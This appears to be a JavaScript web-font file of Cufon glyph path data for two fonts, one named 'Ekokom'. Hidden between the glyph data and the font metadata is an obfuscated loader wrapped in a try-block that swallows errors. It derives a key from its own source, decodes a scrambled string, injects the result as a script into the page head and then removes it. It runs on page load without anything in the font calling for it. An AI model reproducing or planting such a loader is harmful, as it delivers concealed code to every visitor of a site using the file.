v-3,-23,-19,-38,-43,-38v-51,-1,-63,60,-61,97v37,-63,142,-29,142,50v0,37,-21,85,-85,85v-76,0,-88,-68,-88,-122v0,-70,21,-137,94,-137v42,0,68,24,72,65"},{"d":"27,-112v0,-13,11,-23,23,-23v12,0,23,11,23,23v0,12,-11,23,-23,23v-13,0,-23,-11,-23,-23","w":100},{"d":"0,0r89,-132r-84,-125r41,0r64,100r67,-100r38,0r-85,125r90,132r-41,0r-70,-106r-71,106r-38,0","w":219},{"d":"25,0r0,-257r30,0r0,257r-30,0","w":79},{"d":"17,-206r31,-51r39,0r-47,51r-23,0","w":79},{"d":"56,-49r87,-98v-39,-35,-101,-10,-98,54v0,17,4,32,11,44xm151,-136r-87,97v38,35,100,10,97,-54v0,-18,-4,-32,-10,-43xm194,-183r-21,24v45,58,17,163,-70,163v-25,0,-44,-7,-59,-20r-22,24r-10,-9r23,-25v-45,-58,-19,-164,68,-164v25,0,46,7,61,21r21,-24","w":206},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0xm111,-310v23,-1,57,31,67,-1r19,0v-3,20,-13,42,-40,40v-18,-1,-58,-30,-65,1r-19,0v6,-21,15,-40,38,-40","w":259},{"d":"90,-150r0,-84v-23,3,-41,16,-41,43v0,26,17,34,41,41xm110,-113r0,90v27,-2,47,-15,47,-46v0,-27,-21,-36,-47,-44xm9,-78r31,0v1,32,21,50,50,55r0,-95v-51,-12,-73,-28,-73,-70v0,-44,32,-72,73,-75r0,-24r20,0r0,24v39,5,62,30,71,71r-31,0v-5,-23,-18,-37,-40,-41r0,88v36,9,79,16,79,73v0,46,-33,74,-79,78r0,30r-20,0r0,-30v-47,-5,-77,-34,-81,-84"},{"d":"48,-140v10,47,121,19,121,86v0,44,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-50,-122,-19,-122,-88v0,-37,38,-52,70,-52v41,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm67,-206r31,-51r39,0r-47,51r-23,0","w":180},{"d":"181,-126r-32,0v-5,-23,-21,-37,-46,-37v-44,0,-58,34,-58,72v0,34,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,45,-35,72,-82,72v-57,0,-87,-40,-87,-95v0,-56,29,-99,88,-99v42,0,76,20,80,64xm81,-206r31,-51r39,0r-47,51r-23,0","w":193},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70","w":206},{"d":"186,-69v0,-73,-165,-28,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-29,-52,-64,-52v-29,0,-58,11,-58,44v0,32,42,36,83,45v41,9,82,24,82,74v0,50,-45,74,-89,77v-3,5,-11,10,-10,14v17,-8,43,2,42,24v-3,36,-50,37,-78,25r7,-16v12,6,44,9,44,-7v0,-11,-22,-14,-32,-8v-12,-12,5,-22,12,-32v-56,-1,-103,-29,-103,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46","w":233},{"d":"267,-186r-60,186r-32,0r-39,-148r-37,148r-33,0r-60,-186r34,0r43,152r37,-152r34,0r39,152r42,-152r32,0","w":272},{"d":"18,-95r78,-156r24,0r78,156r-25,0r-65,-130r-64,130r-26,0","w":216},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm42,-223r0,-20r123,0r0,20r-123,0","w":206},{"d":"23,-159r55,43r0,32r-55,43r0,-31r36,-28r-36,-28r0,-31xm94,-159r55,43r0,32r-55,43r0,-31r36,-28r-36,-28r0,-31","w":166},{"d":"23,0r0,-186r29,0v1,8,-2,21,1,27v22,-38,93,-46,111,0v25,-46,120,-44,120,23r0,136r-31,0r0,-122v0,-23,-6,-41,-36,-41v-72,-1,-42,99,-48,163r-31,0r0,-122v0,-24,-8,-41,-35,-41v-79,0,-40,93,-49,163r-31,0","w":307},{"d":"18,-86r0,-28r104,0r0,28r-104,0","w":140},{"d":"23,0r0,-257r31,0r0,98v10,-22,37,-31,59,-31v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0"},{"d":"39,-206r-47,-51r39,0r31,51r-23,0","w":79},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm106,-251r0,38r-33,0r0,-38r33,0","w":172},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm95,-271r25,-39r43,0r-41,39r-27,0","w":219},{"d":"9,71r0,-21v51,11,35,-54,35,-97v0,-35,24,-44,31,-49v-8,-1,-31,-12,-31,-49v0,-38,21,-105,-35,-97r0,-21v39,-3,64,5,64,47v0,42,-7,109,30,108r0,24v-35,0,-30,66,-30,108v0,42,-25,50,-64,47","w":119},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm83,-206r31,-51r39,0r-47,51r-23,0"},{"d":"20,71r-24,0v66,-106,64,-228,0,-334r24,0v72,101,76,232,0,334","w":93},{"d":"30,-217r0,-40r40,0v1,44,2,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0","w":100},{"d":"189,-257r0,25r31,0r0,25r-31,0r0,207r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,93,-130,146,-67r0,-46r-71,0r0,-25r71,0r0,-25r30,0xm45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-37,-17,-70,-59,-70v-42,0,-56,36,-56,72","w":213},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,100,25,110,85r-34,0v-7,-39,-38,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm84,-310r18,0v10,25,63,23,75,0r19,0v-3,23,-25,37,-57,37v-33,0,-52,-13,-55,-37","w":273},{"d":"9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm193,-103r23,0v-18,95,-154,59,-147,-26v-11,-88,134,-115,146,-27r-22,0v-19,-62,-107,-34,-100,27v-9,62,90,88,100,26","w":288},{"d":"143,-41r-54,-43r0,-32r54,-43r0,31r-36,28r36,28r0,31xm73,-41r-55,-43r0,-32r55,-43r0,31r-36,28r36,28r0,31","w":166},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm85,-229r0,-28r29,0v1,32,2,65,-29,65r0,-13v12,0,15,-12,15,-24r-15,0"},{"d":"17,-98r0,-24r79,0r0,-60r24,0r0,60r79,0r0,24r-79,0r0,61r-24,0r0,-61r-79,0xm17,0r0,-24r182,0r0,24r-182,0","w":216},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm37,-223r0,-20r123,0r0,20r-123,0","w":193},{"d":"186,-69v0,-73,-165,-28,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-29,-52,-64,-52v-29,0,-58,11,-58,44v0,32,42,36,83,45v41,9,82,24,82,74v0,55,-53,77,-100,77v-58,0,-107,-28,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46xm172,-310r-38,39r-38,0r-39,-39r33,0r25,25r25,-25r32,0","w":233},{"d":"186,-69v0,-73,-165,-28,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-29,-52,-64,-52v-29,0,-58,11,-58,44v0,32,42,36,83,45v41,9,82,24,82,74v0,55,-53,77,-100,77v-58,0,-107,-28,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46","w":233},{"d":"55,0r-30,0r0,-186r30,0r0,186xm40,-206r-47,-51r39,0r31,51r-23,0","w":79},{"d":"151,-255r0,168r34,0r0,27r-34,0r0,60r-29,0r0,-60r-112,0r0,-29r116,-166r25,0xm36,-87r86,0r-1,-125"},{"d":"189,-257r0,257r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,93,-130,146,-67r0,-96r30,0xm45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-37,-17,-70,-59,-70v-42,0,-56,36,-56,72xm206,-229r0,-28r29,0v1,32,2,65,-29,65r0,-13v12,0,15,-12,15,-24r-15,0","w":227},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm154,-257r-37,51r-33,0r-38,-51r30,0r24,35r26,-35r28,0"},{"d":"175,-186r-68,186r-33,0r-69,-186r34,0r53,155r51,-155r32,0","w":180},{"d":"30,0r0,-257r34,0r0,257r-34,0xm10,-278r0,-20r72,0r0,20r-72,0","w":93},{"d":"168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,37,16,70,58,70v42,0,56,-36,56,-72xm24,71r0,-257r31,0r0,25v10,-21,34,-29,60,-29v57,0,86,44,86,97v0,53,-28,97,-85,97v-19,0,-47,-7,-61,-29r0,96r-31,0","w":213},{"d":"199,-140r0,101r-25,0r0,-76r-157,0r0,-25r182,0","w":216},{"d":"186,-69v0,-73,-165,-28,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-29,-52,-64,-52v-29,0,-58,11,-58,44v0,32,42,36,83,45v41,9,82,24,82,74v0,55,-53,77,-100,77v-58,0,-107,-28,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46xm95,-271r25,-39r43,0r-41,39r-27,0","w":233},{"d":"48,-140v10,47,121,19,121,86v0,44,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-50,-122,-19,-122,-88v0,-37,38,-52,70,-52v41,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm140,-257r-37,51r-33,0r-38,-51r30,0r24,35r26,-35r28,0","w":180}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-485-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("k3r>:;VNcdE4kf1qb;.Uh3hEt0V>r;E4t0DUcdierw*MTgNlt)!G_3w1t)!G_[.;t)!G_[.lt)!G_3iC:1W>_nuNV.W>_nKCB.W>_nKCr1W>_nK;T,oot)!G_[!yt)!G_[!>t)!G_[TUbdD$b[PGrdi$b[PW_0w$b[hG_Cr$b[PWVnV$h1W>_nKCV1W>_nu>_e.$b[PGTgV$b[PW_d.$b[PWVCVut)!G_3_yt)!G_[uyw.W>_nKCr.W>_nuGV1W>_nu>V>W>_nuGrwW>_nuG_>W>_nK;T1r$b[PGrCi$b[PGT0.$b[PGrno$b[PGTCo$b[PWV;DRt)!G_[}>t)!G_3T0t)!U_nu`t)!G_[KIt)!G_[_y$>W>_nu,_.W>_nKlV1W>_nKCV>W>_nuN_wW>_nuU_lK$b[PWV[o$b[PWV3V$b[PGr3.$b[PWVnb$b[PWVdr$b[PGT;r$b[PW_gb$b[hW_CD1t)!G_3u0t)!G_[$gt)!G_3}yt)!G_3},t)!G_3!0t)!G_3TUt)!G_3DCB>W>_nuUr1W>_nu0r1W>_nKl_1W>_nugT1W>_nKCT>W>_nuy_1W>_CPW_>W>_nuNV1W>_nu0rwW>_nu>_>W>_nug_!y$b[PGr[h1|vV$?>W>_nKI_.W>_nuWB.W>_nK;VwW>_nKC_.W>_nKIr1W>_nuUr!V$b[PGTdu`t)!G_3D1t)!G_3Tyt)!G_3wlt)!G_3ugt)!G_[Dlt)!G_[hgdwW>_nuWV1W>_nKIVwW>_nuG_.W>_nKCT1W>_nKo_wW>_nKCVwW>_nu>_wW>_nKor1W>_nKI_>W>_nu,_1W>_nK1V>W>_nKoVwW>_nK1V.W>_nu0Tv$;t)!G_3hyt)!G_3wot)!G_3TWt)!G_3}Nt)!G_[u,t)!G_3}Ut)!G_3Tgt)!G_3_Ure1$b[PGrCb}v.W>_nK;r.W>_nK;_ux$b[PWV[rNt)!G_3_N_f`mt)!G_3hGt)!G_3!>wwW>_CPWV.W>_nu,ru^$bPKfnu.3)hDk?_VB|}iv[!wdtTrc:$b87XolCI1;e]^RZMx4=GWUgN>0,`y~q*Emp[PW_n.D[>.$b[PW_0V$b[hG_dV$b[PGr[Iy|.W>_nKo_1W>_nKIr.W>_nK1B)xvcwW>_nu,B.W>_nuG_l.$b[PWVnD$b[hG_d}~iI!Rk>b$b[PWVg.$b[PGr3Dft)!G_Cuyc>W>_nKC_wW>_nugV1W>_nuGV.W>_nuGVwW>_nK1_.W>_nug_nD$b[PGr;r$b[PGTCV$b[PGT[Kb}[.ct)!G_[TNr.W>_nK1_gb$b[PGTd!gt)!G_Cu`t)!G_3w;$1W>_nugTwW>_nKlruNMk.W>_nuW_.x$tnEC71W>_nKoBnw$b[PGT[b$b[PW_3V$b[PWVCw77ub$b[PGr;w$b[PGr[._81W>_nu>V3b$b[PWV0D$b[PWV0w$b[PGT0w$b[PGrnr$b[PGT[i$b[PGT;.$b[PW_[DPt)!G_[!Gt)!G_3i1t)!G_[boV1W>_nKlV>oMt)!G_3hNt)!G_3T`t)!G_3}WD.W>_nu>T1W>_nuGV0E$b[PWVdw,t1W>_nuNr.W>_nKlT;Nxc3K$b[PWV0V$b[PWVg1Et)!G_3rokwW>_CPWBwW>_nuW_wW>_nuWrwW>_nKoBwW>_nKoT1W>_nugr.W>_nKl_wW>_nuW_>W>_nu0_.V$b[PGrd_Nt)!G_[K;t)!G_[}`b1W>_nuUTtK$b[PGTdV$b[PWVd.$b[PWVCul?eVG:31NkfhlkvW^|[PM$n>l?ePM:n>G?;W1:;bNcfWe|dh4rlye:)1Gc)_E8,NqcdT]Tly=cgN=tlXpBeb,b>G4k[*]|g]4k>G4cdygcdi1TwG4T,^*?lx$?;^oc,iUcdi^b.G4T,^*c;.Zb)D^r31NtfyC8eW^:eV^r3wotfyC8lII?0I4b3wgbfoM:0Vob31=:ly]:,VN:;.xrvI^r;EUknx^|3GqkUx^kdb:T>x^twNE$.x^ttN^kfIX")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"Ekokom","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"4","bbox":"-21 -319 372 76","underline-thickness":"18","underline-position":"-36","stemh":"27","stemv":"32","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * CZ-3.0, 1992 Adobe Systems Inc., 2003 Quentin spol. s r.o.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm43,-211r39,-52r40,0r38,52r-33,0r-25,-32r-26,32r-33,0"},{"d":"69,-158v45,-1,43,-75,0,-76v-42,1,-44,75,0,76xm134,-195v0,37,-23,61,-65,61v-42,0,-64,-24,-64,-61v0,-37,22,-62,64,-62v42,0,65,25,65,62","w":136},{"d":"23,69r0,-326r41,0r0,95v11,-18,35,-29,56,-29v59,0,87,45,87,99v0,50,-25,97,-80,97v-23,0,-50,-8,-63,-29r0,93r-41,0xm114,-27v72,0,67,-133,0,-132v-35,0,-52,26,-52,66v0,37,19,66,52,66","w":219},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm96,-271r33,-39r50,0r-51,39r-32,0","w":240},{"d":"26,0r0,-257r47,0r118,189r0,-189r43,0r0,257r-48,0r-118,-189r0,189r-42,0xm110,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":259},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm118,-255r41,0r0,39r-41,0r0,-39xm90,-216r-41,0r0,-39r41,0r0,39","w":206},{"d":"188,-124r-41,0v-3,-23,-19,-35,-42,-35v-21,0,-51,11,-51,68v0,31,13,64,49,64v24,0,40,-16,44,-43r41,0v-8,48,-37,75,-85,75v-58,0,-90,-41,-90,-96v0,-56,30,-100,91,-100v43,0,80,21,84,67xm161,-263r-39,51r-40,0r-38,-51r33,0r25,32r26,-32r33,0"},{"d":"-1,-81r0,-32v10,0,33,-6,33,-27r0,-74v7,-48,36,-52,79,-49r0,32v-24,-4,-44,5,-40,25r0,71v1,30,-27,34,-37,38v12,1,37,5,37,40v0,40,-23,102,40,93r0,33v-44,3,-79,-1,-79,-50r0,-71v0,-23,-23,-29,-33,-29","w":106},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,60,-34,93,-88,98v-20,17,-26,29,-26,40v0,20,24,20,33,4r15,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,1,-20,30,-40v-60,-2,-101,-35,-101,-99","w":259},{"d":"26,69r0,-332r80,0r0,32r-41,0r0,267r41,0r0,33r-80,0","w":106},{"d":"25,-134r0,-48r50,0r0,48r-50,0xm25,0r0,-49r50,0r0,49r-50,0","w":100},{"d":"72,-220r0,80v50,-2,120,14,118,-41v-2,-60,-68,-33,-118,-39xm27,0r0,-257r123,0v56,0,85,25,85,69v0,50,-35,60,-42,66v15,2,38,13,38,54v0,30,4,58,14,68r-48,0v-15,-44,4,-106,-58,-106r-67,0r0,106r-45,0xm180,-310r-39,39r-44,0r-38,-39r35,0r25,22r26,-22r35,0","w":253},{"d":"147,-70r41,0v-7,46,-34,72,-77,74v-4,6,-10,11,-13,18v20,-4,42,3,42,25v0,38,-52,38,-80,25r6,-14v15,6,46,12,46,-9v0,-14,-21,-18,-31,-10r-8,-7r21,-28v-53,-4,-81,-44,-81,-95v0,-56,30,-100,91,-100v43,0,80,21,84,67r-41,0v-3,-23,-19,-35,-42,-35v-21,0,-51,11,-51,68v0,31,13,64,49,64v24,0,40,-16,44,-43"},{"d":"64,0r-41,0r0,-186r41,0r0,186xm-18,-263r48,0r33,51r-30,0","w":86},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98","w":213},{"d":"246,-175r-45,0v-8,-30,-27,-51,-64,-51v-55,0,-78,48,-78,97v0,49,23,98,78,98v40,0,61,-30,65,-67r44,0v-4,62,-47,104,-109,104v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134v58,0,104,33,109,88xm198,-310r-39,39r-44,0r-38,-39r35,0r25,22r26,-22r35,0","w":259},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm83,-212r32,-51r49,0r-51,51r-30,0"},{"d":"27,0r0,-257r45,0r0,39r69,0v73,0,87,47,87,79v0,32,-14,79,-87,79r-69,0r0,60r-45,0xm72,-181r0,85v52,-3,111,15,111,-43v0,-60,-61,-38,-111,-42","w":240},{"d":"152,-218r-57,118r70,0r0,-118r-13,0xm-3,0r128,-257r208,0r0,39r-126,0r0,67r118,0r0,37r-118,0r0,75r128,0r0,39r-170,0r0,-66r-87,0r-30,66r-51,0","w":346},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm172,-276r-104,0r0,-23r104,0r0,23","w":240},{"w":100},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm135,-309r41,0r0,39r-41,0r0,-39xm107,-270r-41,0r0,-39r41,0r0,39","w":226},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm49,-212r33,-51r49,0r-52,51r-30,0xm128,-212r33,-51r49,0r-52,51r-30,0","w":213},{"d":"246,-175r-45,0v-8,-30,-27,-51,-64,-51v-55,0,-78,48,-78,97v0,49,23,98,78,98v40,0,61,-30,65,-67r44,0v-4,62,-47,104,-109,104v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134v58,0,104,33,109,88xm108,-271r33,-39r51,0r-52,39r-32,0","w":259},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm95,-312v28,0,57,30,69,-3r20,0v-4,23,-13,42,-40,42v-21,1,-59,-31,-66,1r-21,0v3,-18,16,-40,38,-40","w":240},{"d":"22,0r0,-186r38,0v1,11,-2,27,1,36v6,-24,36,-47,70,-40r0,40v-41,-9,-68,13,-68,61r0,89r-41,0xm134,-263r-39,51r-40,0r-38,-51r33,0r25,32r26,-32r33,0","w":126},{"d":"25,0r0,-49r50,0r0,49r-50,0","w":100},{"d":"137,-31v81,0,60,-72,62,-144v0,-27,-21,-51,-62,-51v-104,1,-104,195,0,195xm242,-218r0,67r123,0r0,37r-123,0r0,75r137,0r0,39r-178,0r0,-23v-17,20,-42,29,-68,29v-76,0,-118,-62,-118,-133v0,-98,108,-181,186,-110r0,-20r175,0r0,39r-134,0","w":393},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm184,-310r-39,39r-43,0r-39,-39r35,0r25,22r26,-22r35,0","w":226},{"d":"72,-1r-71,-185r45,0r49,139r48,-139r42,0r-72,196v-12,42,-37,74,-94,62r0,-35v33,12,49,-11,53,-38xm108,-255r41,0r0,39r-41,0r0,-39xm80,-216r-41,0r0,-39r41,0r0,39","w":186},{"d":"3,-218r0,-39r208,0r0,39r-82,0r0,218r-45,0r0,-218r-81,0xm88,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":213},{"d":"72,-71r118,-133v-12,-14,-29,-22,-53,-22v-76,0,-94,95,-65,155xm202,-186r-118,133v13,14,30,22,53,22v76,0,94,-95,65,-155xm244,-264r15,13r-28,32v63,79,20,225,-94,225v-33,0,-60,-11,-80,-29r-27,30r-16,-13r29,-32v-62,-80,-20,-225,94,-225v33,0,60,11,80,29","w":273},{"d":"23,0r0,-135r-25,19r0,-26r25,-19r0,-96r41,0r0,64r24,-19r0,26r-24,19r0,167r-41,0","w":86},{"d":"118,-115r0,64r-25,0r0,-150v50,0,111,-8,111,43v0,27,-17,38,-39,41r42,66r-28,0r-38,-64r-23,0xm118,-136v28,-2,62,8,62,-23v0,-28,-35,-20,-62,-21r0,44xm276,-129v0,81,-61,135,-132,135v-77,0,-132,-58,-132,-135v0,-81,61,-134,132,-134v71,0,132,53,132,134xm247,-129v0,-66,-45,-111,-103,-111v-58,0,-103,45,-103,111v0,61,39,112,103,112v58,0,103,-46,103,-112","w":288},{"d":"27,0r0,-257r45,0r0,257r-45,0xm72,-271r-32,-39r-51,0r51,39r32,0","w":100},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm114,-255r42,0r0,39r-42,0r0,-39xm86,-216r-41,0r0,-39r41,0r0,39"},{"d":"27,0r0,-257r45,0r0,257r-45,0xm27,-271r32,-39r51,0r-51,39r-32,0","w":100},{"d":"109,-110r0,84v26,-2,44,-14,44,-43v0,-27,-22,-35,-44,-41xm6,-78r41,0v0,32,13,51,46,52r0,-87v-39,-11,-81,-27,-81,-80v0,-46,38,-70,81,-70r0,-28r16,0r0,28v43,0,79,22,79,70r-41,0v-1,-24,-12,-38,-38,-38r0,76v44,12,85,28,85,80v0,54,-37,79,-85,81r0,28r-16,0r0,-28v-52,-1,-88,-30,-87,-84xm93,-159r0,-72v-26,0,-40,11,-40,36v0,23,20,31,40,36"},{"d":"72,-1r-71,-185r45,0r49,139r48,-139r42,0r-72,196v-12,42,-37,74,-94,62r0,-35v33,12,49,-11,53,-38xm80,-212r33,-51r48,0r-51,51r-30,0","w":186},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm109,-271r32,-39r51,0r-51,39r-32,0","w":259},{"d":"89,58r0,-182v-47,0,-78,-27,-78,-65v0,-82,97,-68,177,-68r0,315r-29,0r0,-292r-42,0r0,292r-28,0","w":216},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm70,-271r39,-39r44,0r39,39r-36,0r-25,-22r-26,22r-35,0","w":259},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm41,-211r39,-52r40,0r38,52r-33,0r-25,-32r-26,32r-33,0"},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm76,-271r39,-39r44,0r39,39r-36,0r-25,-22r-25,22r-36,0","w":273},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm105,-198v-20,0,-37,-17,-37,-37v0,-20,17,-37,37,-37v20,0,37,17,37,37v0,20,-17,37,-37,37xm83,-235v0,12,10,22,22,22v12,0,22,-10,22,-22v0,-12,-10,-22,-22,-22v-12,0,-22,10,-22,22","w":206},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm153,-271r-33,-39r-51,0r52,39r32,0","w":226},{"d":"72,-220r0,183r45,0v71,0,85,-41,85,-92v0,-51,-14,-91,-85,-91r-45,0xm27,0r0,-257r107,0v79,0,113,57,113,128v0,71,-34,129,-113,129r-107,0xm171,-310r-39,39r-44,0r-38,-39r35,0r25,22r26,-22r35,0","w":259},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm101,-271r32,-39r51,0r-51,39r-32,0","w":226},{"d":"20,-218r0,-39r195,0r0,34r-149,184r153,0r0,39r-211,0r0,-37r150,-181r-138,0xm138,-281r-41,0r0,-39r41,0r0,39","w":226},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm74,-271r33,-39r49,0r-52,39r-30,0xm153,-271r32,-39r49,0r-51,39r-30,0","w":273},{"d":"166,-257r0,174v0,45,-11,89,-85,89v-59,-1,-79,-40,-76,-96r45,0v-1,33,3,59,35,59v29,0,36,-17,36,-49r0,-177r45,0","w":193},{"d":"22,32r0,-90r36,0r0,90r-36,0xm22,-148r0,-90r36,0r0,90r-36,0","w":79},{"d":"22,6r0,-269r36,0r0,269r-36,0","w":79},